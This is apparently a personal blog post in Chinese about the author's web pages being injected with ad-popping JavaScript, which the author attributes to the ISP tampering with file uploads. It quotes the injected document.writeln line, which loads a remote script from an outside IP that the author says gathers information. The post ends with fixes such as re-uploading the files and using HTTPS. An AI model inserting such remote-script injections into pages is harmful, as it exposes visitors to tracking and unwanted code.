HTML被恶意注入JS弹广告

自己写个的网页上传到阿里云服务器供APP访问，突然发现在手机访问该页面时间歇性的弹出广告。你说膈应人不??

然后再用浏览器访问，查看源码发现在<head> 中多了一行这个东西

http://45.126.123.80:118/j.js?MAC=8CAB8EBA6EB8

点击进去

 document.writeln("<script src=\'http://45.126.123.80:118/t.php\'>
</script>");

继续查看http://45.126.123.80:118/t.php 一堆代码，获取各种信息。。。

瞬间心里很不爽，自己的页面就这样被人插了。

开始怀疑

• 买的阿里云服务器被黑了
• 文件上传软件有漏洞被人恶意篡改了

一番尝试之后

以上两点都不是，是由于上传文件时被运营商拦截了，然后注入上面js代码。

1、我换用手机4G网络连接，新建HTML文件上传，浏览，查看源码，一切正常。

2、我换用同事360WiFi热点后，重复1操作，一切正常。

3、我再次连接公司网络，重复1操作，还是出现恶心的js注入。

所以，我不得不把我的所有html页面重新上传覆盖了一遍。。。问题貌似解决了。

总结

网络运营商搞得鬼，拦截你的请求、插入你的代码、然后给你弹出广告、然后自己获利赚钱，整个一套不要脸的流程。

解决途径：

• 像我一样替换网络重新上传覆盖原有被插的文件
• 打电话给运营商，骂他，骂到不在插你为止
• 使用https

以此记录，大家也要留意了。